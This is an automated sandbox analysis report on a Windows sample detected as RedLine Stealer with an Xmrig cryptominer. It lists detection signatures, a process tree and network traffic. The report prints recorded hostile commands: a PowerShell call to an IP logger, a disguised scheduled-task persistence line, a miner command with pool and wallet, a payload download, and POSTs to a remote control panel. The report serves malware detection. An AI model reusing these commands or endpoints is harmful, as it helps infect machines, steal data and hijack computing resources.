Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 8TD8GfTtaW.exe

Overview

General Information

Sample Name:8TD8GfTtaW.exe
Analysis ID:356507
MD5:a5d3fdf55abb54ec0b632dee9d3459d4
SHA1:c177421eb77f0d341e5d1bd6cfbccb60e0c86a1c
SHA256:677618666eb31c80e9dbecb17907676d2da2a39d24f7c20785ef577239ef5e6f
Tags:exeRedLineStealer

Most interesting Screenshot:

Detection

RedLine Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Xmrig
Yara detected RedLine Stealer
Yara detected Xmrig cryptocurrency miner
Binary contains a suspicious time stamp
Connects to a pastebin service (likely for C&C)
Detected Stratum mining protocol
Drops PE files to the startup folder
Found strings related to Crypto-Mining
Hides threads from debuggers
Machine Learning detection for dropped file
PE file contains section with special chars
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Writes or reads registry keys via WMI
Writes registry values via WMI
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates driver files
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Is looking for software installed on the system
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file contains strange resources
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Startup

  • System is w10x64
  • 8TD8GfTtaW.exe (PID: 6708 cmdline: 'C:\Users\user\Desktop\8TD8GfTtaW.exe' MD5: A5D3FDF55ABB54EC0B632DEE9D3459D4)
    • nulhfhsi.exe (PID: 6988 cmdline: 'C:\Users\user\AppData\Local\nulhfhsi.exe' MD5: 70DCA411445D3B4394D9C467BF3FF994)
      • evs.exe (PID: 6396 cmdline: 'C:\Users\user\AppData\Local\Temp\evs.exe' MD5: 8C373745D8604DA05314DE16F0BF7CED)
        • cmd.exe (PID: 5964 cmdline: 'cmd' /c start '' 'hello_C# (2).exe' & start '' 'hello_C#.exe' & start '' 'jo.exe' & powershell -command 'Invoke-WebRequest -Uri https://iplogger.org/1n6Zw7' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • hello_C# (2).exe (PID: 6252 cmdline: 'hello_C# (2).exe' MD5: D6B9F530E7E8DDEBEA8069A0D94AD38E)
            • conhost.exe (PID: 1488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • hello_C#.exe (PID: 6800 cmdline: 'hello_C#.exe' MD5: D6B9F530E7E8DDEBEA8069A0D94AD38E)
            • conhost.exe (PID: 4648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • jo.exe (PID: 4948 cmdline: 'jo.exe' MD5: 28E49F705BFD5A6785391BAC1C0E3359)
          • powershell.exe (PID: 6420 cmdline: powershell -command 'Invoke-WebRequest -Uri https://iplogger.org/1n6Zw7' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • revs.exe (PID: 4784 cmdline: 'C:\Users\user\AppData\Local\Temp\revs.exe' MD5: 029CE2E532FE5C70D3342F978F5463D0)
    • lxoqz3o0.exe (PID: 5748 cmdline: 'C:\Users\user\AppData\Local\lxoqz3o0.exe' MD5: F0ECEFED65B00699CC2B57BF81492F56)
      • schtasks.exe (PID: 6212 cmdline: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 6300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cpu.exe (PID: 6272 cmdline: 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1 MD5: E95F766A3748042EFBF0F05D823F82B7)
        • conhost.exe (PID: 5544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • RantimeBroker.exe (PID: 6352 cmdline: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe MD5: F0ECEFED65B00699CC2B57BF81492F56)
    • schtasks.exe (PID: 328 cmdline: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cpu.exe (PID: 7072 cmdline: 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1 MD5: E95F766A3748042EFBF0F05D823F82B7)
  • iexplore.exe (PID: 6064 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6360 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6064 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • Chrome updater.exe (PID: 5056 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome updater.exe' MD5: 029CE2E532FE5C70D3342F978F5463D0)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\Windows\CPU\config.jsonJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        00000004.00000003.395439436.0000000006A7E000.00000004.00000001.sdmpCoinMiner_StringsDetects mining pool protocol string in ExecutableFlorian Roth
        • 0x32753:$s1: stratum+tcp://
        00000004.00000003.395439436.0000000006A7E000.00000004.00000001.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          00000011.00000002.528913817.00000247A05AB000.00000004.00000001.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            00000004.00000003.395495832.0000000006A8E000.00000004.00000001.sdmpCoinMiner_StringsDetects mining pool protocol string in ExecutableFlorian Roth
            • 0x22753:$s1: stratum+tcp://
            Click to see the 32 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            37.2.Chrome updater.exe.400000.0.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
            • 0x8284:$s2: .2265|ii
            6.2.lxoqz3o0.exe.f0000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              14.2.RantimeBroker.exe.1130000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                25.2.revs.exe.400000.0.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
                • 0x8284:$s2: .2265|ii
                4.2.nulhfhsi.exe.3b0000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  Click to see the 1 entries

                  Sigma Overview

                  System Summary:

                  barindex
                  Sigma detected: XmrigShow sources
                  Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1, CommandLine: 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe, NewProcessName: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe, ParentCommandLine: 'C:\Users\user\AppData\Local\lxoqz3o0.exe' , ParentImage: C:\Users\user\AppData\Local\lxoqz3o0.exe, ParentProcessId: 5748, ProcessCommandLine: 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1, ProcessId: 6272

                  Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Antivirus detection for URL or domainShow sources
                  Source: https://blog.agencia10x.com/dance.exeAvira URL Cloud: Label: malware
                  Source: https://blog.agencia10x.com/mex.exeAvira URL Cloud: Label: malware
                  Multi AV Scanner detection for domain / URLShow sources
                  Source: blog.agencia10x.comVirustotal: Detection: 10%Perma Link
                  Multi AV Scanner detection for dropped fileShow sources
                  Source: C:\Users\user\AppData\Local\Temp\evs.exeReversingLabs: Detection: 82%
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeReversingLabs: Detection: 79%
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeMetadefender: Detection: 24%Perma Link
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeReversingLabs: Detection: 89%
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeReversingLabs: Detection: 60%
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeMetadefender: Detection: 21%Perma Link
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeReversingLabs: Detection: 65%
                  Multi AV Scanner detection for submitted fileShow sources
                  Source: 8TD8GfTtaW.exeVirustotal: Detection: 43%Perma Link
                  Machine Learning detection for dropped fileShow sources
                  Source: C:\Users\user\AppData\Local\Temp\evs.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeJoe Sandbox ML: detected
                  Source: 31.3.jo.exe.860000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                  Source: 31.2.jo.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                  Source: 31.2.jo.exe.850e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                  Source: 4.2.nulhfhsi.exe.3b0000.0.unpackAvira: Label: TR/Dropper.Gen

                  Bitcoin Miner:

                  barindex
                  Yara detected Xmrig cryptocurrency minerShow sources
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.395439436.0000000006A7E000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.528913817.00000247A05AB000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.395495832.0000000006A8E000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.502801011.000002ABFF27A000.00000004.00000020.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000003.310965675.000002ABFF28A000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.395598364.0000000006AAB000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000003.270094452.0000000000BE0000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.497823578.0000000000FA9000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.502678236.000002ABFF250000.00000004.00000020.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.476502860.0000000004B5A000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.501705858.0000000001132000.00000020.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000003.295958006.0000000001840000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.476458617.0000000004A5A000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.498040430.00000000000F2000.00000020.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.502700687.000002ABFF257000.00000004.00000020.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.395324200.0000000006A7E000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 5544, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RantimeBroker.exe PID: 6352, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: cpu.exe PID: 6272, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: nulhfhsi.exe PID: 6988, type: MEMORY
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Windows\CPU\config.json, type: DROPPED
                  Source: Yara matchFile source: 6.2.lxoqz3o0.exe.f0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.RantimeBroker.exe.1130000.0.unpack, type: UNPACKEDPE
                  Detected Stratum mining protocolShow sources
                  Source: global trafficTCP traffic: 192.168.2.5:49730 -> 51.68.21.186:4444 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"42zyh6myztcdlqfmcpscggn8ppdku4pk16kh8uffytesddfwt5ihd2qfsws2bgnuwxwfnrtbjbr5w7dqgebrzdjcuzia53j./","pass":"x","agent":"xmrig/6.8.0 (windows nt 10.0; win64; x64) libuv/1.40.0 msvc/2019","algo":["cn/r","cn/2","cn/1","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/ccx","rx/0","rx/wow","rx/arq","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/wrkz","astrobwt"]}}.
                  Found strings related to Crypto-MiningShow sources
                  Source: nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmpString found in binary or memory: ID: 6272, Name: cpu.exe, CommandLine: "C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe" -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
                  Source: nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmpString found in binary or memory: ID: 6272, Name: cpu.exe, CommandLine: "C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe" -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
                  Source: nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmpString found in binary or memory: ID: 6272, Name: cpu.exe, CommandLine: "C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe" -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
                  Source: conhost.exe, 00000011.00000002.528975552.00000247A08D0000.00000004.00000001.sdmpString found in binary or memory: XMRig 6.8.0

                  Compliance:

                  barindex
                  Detected unpacking (overwrites its own PE header)Show sources
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeUnpacked PE file: 31.2.jo.exe.400000.0.unpack
                  Uses 32bit PE filesShow sources
                  Source: 8TD8GfTtaW.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Uses insecure TLS / SSL version for HTTPS connectionShow sources
                  Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49744 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49745 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49746 version: TLS 1.0
                  Uses new MSVCR DllsShow sources
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                  Uses secure TLS version for HTTPS connectionsShow sources
                  Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49720 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.23.99.190:443 -> 192.168.2.5:49721 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.67.51:443 -> 192.168.2.5:49723 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49729 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.213.210:443 -> 192.168.2.5:49739 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.5:49740 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 52.217.107.52:443 -> 192.168.2.5:49741 version: TLS 1.2
                  Binary contains paths to debug symbolsShow sources
                  Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: 8TD8GfTtaW.exe, 00000000.00000002.268372071.000000000139C000.00000040.00020000.sdmp, lxoqz3o0.exe, 00000006.00000002.498547574.0000000000100000.00000040.00020000.sdmp, RantimeBroker.exe, 0000000E.00000002.501902431.0000000001140000.00000040.00020000.sdmp, revs.exe, 00000019.00000002.500038394.000000000041A000.00000040.00020000.sdmp, Chrome updater.exe, 00000025.00000002.500186949.000000000041A000.00000040.00020000.sdmp
                  Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WinRing0x64.sys.6.dr
                  Source: Binary string: Z:\Oreans Projects\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: nulhfhsi.exe, 00000004.00000002.444265627.00000000004B6000.00000040.00020000.sdmp
                  Source: C:\Users\user\AppData\Local\Temp\evs.exeCode function: 22_2_004062F0 FindFirstFileA,FindClose,
                  Source: C:\Users\user\AppData\Local\Temp\evs.exeCode function: 22_2_004057B5 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
                  Source: C:\Users\user\AppData\Local\Temp\evs.exeCode function: 22_2_00402765 FindFirstFileA,
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_008B7AA8 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,

                  Networking:

                  barindex
                  Connects to a pastebin service (likely for C&C)Show sources
                  Source: unknownDNS query: name: pastebin.com
                  Uses known network protocols on non-standard portsShow sources
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 3214
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3214 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3214 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 3214
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3214 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3214 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 3214
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3214 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3214 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 3214
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3214 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3214 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 3214
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3214 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3214 -> 49743
                  Source: global trafficTCP traffic: 192.168.2.5:49730 -> 51.68.21.186:4444
                  Source: global trafficTCP traffic: 192.168.2.5:49733 -> 87.251.71.75:3214
                  Source: global trafficTCP traffic: 192.168.2.5:49736 -> 193.0.6.135:43
                  Source: global trafficHTTP traffic detected: GET /cpu.zip HTTP/1.1Host: 195.2.84.91Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/IRemotePanel/GetSettings"Host: 87.251.71.75:3214Content-Length: 136Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/IRemotePanel/SendClientInfo"Host: 87.251.71.75:3214Content-Length: 1101816Expect: 100-continueAccept-Encoding: gzip, deflate
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/IRemotePanel/GetTasks"Host: 87.251.71.75:3214Content-Length: 1080046Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/IRemotePanel/CompleteTask"Host: 87.251.71.75:3214Content-Length: 1080072Expect: 100-continueAccept-Encoding: gzip, deflate
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/IRemotePanel/CompleteTask"Host: 87.251.71.75:3214Content-Length: 1080072Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 193.0.6.135 193.0.6.135
                  Source: Joe Sandbox ViewIP Address: 104.23.99.190 104.23.99.190
                  Source: Joe Sandbox ViewIP Address: 104.23.99.190 104.23.99.190
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49744 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49745 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49746 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
